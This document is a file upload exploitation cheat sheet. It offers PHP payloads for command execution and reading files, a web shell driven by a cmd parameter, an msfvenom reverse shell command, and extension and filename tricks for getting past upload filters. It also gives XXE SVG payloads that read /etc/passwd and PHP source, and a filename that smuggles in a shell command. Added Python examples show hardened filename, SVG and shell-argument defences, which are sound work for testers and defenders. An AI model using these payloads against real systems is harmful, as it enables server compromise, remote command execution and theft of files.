File Upload Cheat Sheet
PHP Payloads
Basic PHP payload that prints "hi" on the page. It is a harmless first probe: if "hi" is rendered the upload is being executed, if the raw source comes back it is being served as static content:

```php
<?php echo "hi"; ?>
```
Payload to execute a system command (replace cmd with the command to run):

```php
<?php system('cmd'); ?>
```
Payload to read a file from the system and print it into the response:

```php
<?php echo file_get_contents('/file_location'); ?>
```
Web Shell
A minimal web shell that executes whatever arrives in the cmd parameter. Because it reads $_REQUEST, the command can be supplied in the query string, in a POST body or in a cookie:

```php
<?php system($_REQUEST['cmd']); ?>
```

Once uploaded, request it as /path/to/shell.php?cmd=id and the command output comes back in the response body.
This msfvenom command generates a PHP reverse shell:

```sh
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > shell.php
```
Adjust the -p payload flag for shells in other languages as needed, and replace LHOST and LPORT with your listener's IP and port. Ready-made PHP reverse shells worth knowing: php-reverse-shell, phpbash, and the web shells collected in SecLists.
Bypassing Blacklist Filters
If the extension you want is blacklisted, try the alternative extensions that servers commonly still hand to the PHP interpreter, such as .phtml, .phar, .php3, .php5 or .phps (which of these execute depends on the server's handler configuration; a wordlist of web extensions gives many more candidates). Blacklists that compare case-sensitively can also be bypassed by varying the case of the extension, for example .PHP or .pHp, because Apache's mod_mime matches extensions case-insensitively.

Use the echo payload from above as the first thing you upload: it tells you whether code execution works before you risk a noisier payload.
Bypassing Whitelist Filters
Whitelist filters usually check that an allowed extension is present, but not that it is the only one or the last one. Try double extensions such as shell.jpg.php, which passes a filter that looks for ".jpg" anywhere in the name or only at the first dot. The reverse order, shell.php.jpg, can also work: with Apache mod_mime every dot-separated segment is treated as an extension, so if PHP is registered with AddHandler for .php (rather than SetHandler inside a FilesMatch on the final extension) the file is still executed as PHP.

A wordlist of such variants helps with fuzzing.
Alternatively, add characters before or after the extension so that the filter, the application and the filesystem or web server each interpret the filename differently. Examples:
| Character | Example |
|---|---|
| %0d0a | shell.php%0d0a.jpg |
| %00 | shell.php%00.jpg |
| %20 | shell.php%20.jpg |
| %0a | shell.php%0a.jpg |
| / | shell.php/.jpg |
| .\ | shell.php.\jpg |
| : | shell.php:.jpg |
| ... | shell.php....jpg |
| . | shell.php..jpg |
The null byte (%00), for example, relies on C-string truncation: the filter accepts shell.php%00.jpg because it ends in .jpg, but once the name is decoded the runtime stops reading the path at the NUL, so the file is written as shell.php.

Note: PHP rejects paths containing NUL bytes since 5.3.4, so this only works against older versions. The other characters exploit similar mismatches in how the name is normalized at each layer (Windows, for instance, strips trailing dots and spaces from filenames, and ':' introduces an NTFS alternate data stream).
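To make the bypasses above concrete, here is an added example written for this cheat sheet (not code from the original post or from any real application): two hypothetical filters that model the naive blacklist and whitelist checks just described, beside a hardened version, all run against the payload names from the table. The allowed and blocked extension sets, the payload list and the use of a random server-side filename are assumptions of the example.

```python
import uuid
from urllib.parse import unquote

# Hypothetical filter implementations written for this cheat sheet to model the
# checks discussed above; they are not taken from any real application.

ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}
BLOCKED = {".php"}

# Constructed sample input: the payload names from the sections above.
PAYLOADS = [
    "shell.php", "shell.pHp", "shell.phtml", "shell.jpg.php", "shell.php.jpg",
    "shell.php%00.jpg", "shell.php%20.jpg", "shell.php%0a.jpg",
    "shell.php%0d0a.jpg", "shell.php/.jpg", "shell.php:.jpg", "shell.php..jpg",
]


def naive_blacklist(filename):
    """Accepts unless the final extension is exactly, case-sensitively, '.php'."""
    ext = "." + filename.rsplit(".", 1)[-1]
    return ext not in BLOCKED


def naive_whitelist(filename):
    """Accepts if an allowed extension appears anywhere in the name."""
    return any(ext in filename for ext in ALLOWED)


def hardened(filename):
    """Return a safe server-side filename, or None to reject the upload.

    The client name is used only to select an allowed extension; the stored
    name is random, so no bypass character survives into the path, and a
    double extension like shell.php.jpg is stored as <hex>.jpg, which the web
    server never hands to PHP. Content (magic bytes) checking is a separate
    layer not shown here.
    """
    name = unquote(filename)  # see the name as a decoding server would
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        return None  # %00, %0a, %0d0a and other control characters
    if any(c in name for c in "/\\:"):
        return None  # path separators and NTFS stream syntax
    base, dot, ext = name.rpartition(".")
    if not dot or not base or not ext:
        return None
    ext = "." + ext.lower()
    if ext not in ALLOWED:
        return None
    return uuid.uuid4().hex + ext


def compare(payloads=PAYLOADS):
    """Return {payload: (blacklist_ok, whitelist_ok, hardened_ok)}."""
    return {p: (naive_blacklist(p), naive_whitelist(p), hardened(p) is not None)
            for p in payloads}


if __name__ == "__main__":
    for name, (bl, wl, hd) in compare().items():
        print(f"{name:22} blacklist={bl!s:5} whitelist={wl!s:5} hardened={hd}")
```

Note that the hardened filter still accepts shell.php.jpg, and that is fine: the stored name is `<random>.jpg`, so the Apache multi-extension behaviour described above is never reachable. Rejecting the name is not the defence; never using it as the path is.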
This Python script generates a wordlist of these variants to fuzz with:

```python
# Filename mangling characters from the table above, URL-encoded where needed.
chars = ['%20', '%0a', '%00', '%0d0a', '/', '.\\', '.', '...', ':']
extensions = ['.php']

with open('list.txt', 'w') as f:
    for char in chars:
        for ext in extensions:
            # character between the base name and the executable extension
            f.write(f"shell{char}{ext}.jpg\n")
            # character between the executable extension and the decoy extension
            f.write(f"shell{ext}{char}.jpg\n")
            # decoy extension first, executable extension last
            f.write(f"shell.jpg{char}{ext}\n")
            f.write(f"shell.jpg{ext}{char}\n")
```
Other Attacks
If only images are allowed, the upload may still be exploitable through the image processing itself. SVG is XML, so if the server accepts .svg and parses it with an XML parser that resolves external entities (for example to render a thumbnail), uploading the following in place of a real image may exploit an XXE vulnerability and read /etc/passwd, with the file contents appearing wherever the SVG text is rendered or echoed back:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
```
Alternatively, when the parser is PHP's (libxml), the php://filter wrapper lets you read the source of index.php as base64, which avoids breaking the XML with the angle brackets in the PHP file:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
```
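On the defending side, the simplest check against both payloads is to refuse any uploaded SVG that carries a DTD at all, since legitimate SVG files do not need one. The following is an added example written for this cheat sheet (not code from the original post) that uses expat from the Python standard library to inspect an upload without ever fetching an external entity; the two sample SVGs are constructed inline, the first being the payload above.

```python
import xml.parsers.expat

# Constructed samples: the XXE payload from the section above and a harmless SVG.
XXE_SVG = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
           b'<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
           b'<svg>&xxe;</svg>')
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              b'<rect width="10" height="10"/></svg>')


def inspect_svg(data):
    """Parse an SVG with expat and report any DTD machinery it uses.

    External entities are never fetched: the reference handler only records
    the target and returns 1 so parsing continues. Returns a dict with keys
    'doctype' (bool), 'entities' (list of (name, system_id)), 'ext_refs'
    (list of system ids) and, on malformed input, 'error'.
    """
    report = {"doctype": False, "entities": [], "ext_refs": []}
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = True

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        report["entities"].append((name, system_id))

    def on_external_ref(context, base, system_id, public_id):
        report["ext_refs"].append(system_id)
        return 1  # non-zero means handled; nothing is read from system_id

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        report["error"] = str(exc)
    return report


def svg_upload_allowed(data):
    """Policy: well-formed XML with no DOCTYPE, no entity declarations and no
    external entity references. Legitimate SVG needs none of these."""
    r = inspect_svg(data)
    return ("error" not in r and not r["doctype"]
            and not r["entities"] and not r["ext_refs"])


if __name__ == "__main__":
    for label, blob in (("xxe", XXE_SVG), ("benign", BENIGN_SVG)):
        print(label, inspect_svg(blob), "allowed:", svg_upload_allowed(blob))
```

The report is useful beyond the yes/no decision: logging the declared entity and the system id it points at (file:///etc/passwd or a php://filter URL) gives the SOC an exact indicator of what the uploader was after.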
Another approach is injection through the filename itself: SQL injection if the name is concatenated into a query that records the upload, or command injection if it is concatenated into a shell command. For example, if the server moves uploaded images with a command such as

```sh
mv image /uploads
```

where image is the user-supplied filename interpolated into the command string, naming the file img$(whoami).png makes the shell run whoami when it parses that string. This only works when a shell interprets the string; a program that passes the filename to mv as a single argument is not affected. The filename is fully under your control in the multipart Content-Disposition header when you send the request through an intercepting proxy, regardless of what the browser would allow.
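The following added example (written for this cheat sheet, not code from the original post) models the vulnerable move in Python rather than PHP: the filename is glued into a command string beside the two fixed forms, and a constructed filename with a harmless `$(echo injected)` marker stands in for `$(whoami)` so the substitution can be observed without running whoami. The upload directory and the use of printf in place of mv are assumptions of the example.

```python
import shlex
import subprocess

UPLOAD_DIR = "/uploads"  # assumed destination, matching the mv example above

# Constructed filename; "injected" appears in the output only if the shell
# performed the $(...) substitution.
EVIL_NAME = "img$(echo injected).png"


def build_unsafe(filename):
    """Vulnerable pattern: the filename is glued into a command string, so a
    shell will parse $(...), backticks, ;, | and friends inside it."""
    return f"mv {filename} {UPLOAD_DIR}"


def build_safe_argv(filename):
    """Fixed pattern: the filename is one argv element; no shell ever sees it."""
    return ["mv", filename, UPLOAD_DIR]


def build_safe_quoted(filename):
    """If a shell string is unavoidable, shlex.quote turns the name into a
    single-quoted literal that the shell will not interpret."""
    return f"mv {shlex.quote(filename)} {UPLOAD_DIR}"


def shell_sees(filename):
    """Show what /bin/sh does with the name in the unsafe and the quoted form,
    using printf in place of mv so nothing is moved.
    Returns (unsafe_output, quoted_output)."""
    unsafe = subprocess.run(f"printf '%s\\n' {filename}", shell=True,
                            capture_output=True, text=True).stdout.strip()
    quoted = subprocess.run(f"printf '%s\\n' {shlex.quote(filename)}", shell=True,
                            capture_output=True, text=True).stdout.strip()
    return unsafe, quoted


if __name__ == "__main__":
    print(build_unsafe(EVIL_NAME))       # $(echo injected) is live shell syntax here
    print(build_safe_argv(EVIL_NAME))    # the name travels as one argument
    print(build_safe_quoted(EVIL_NAME))  # or as a quoted literal
    print(shell_sees(EVIL_NAME))
```

The argv form is the real fix; quoting is the fallback for code that cannot drop the shell. Either way the filename should additionally be replaced by a server-generated name before it reaches the filesystem, which also closes the extension tricks covered earlier.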
Thank you for reading! If there’s anything specific you’d like added, let me know.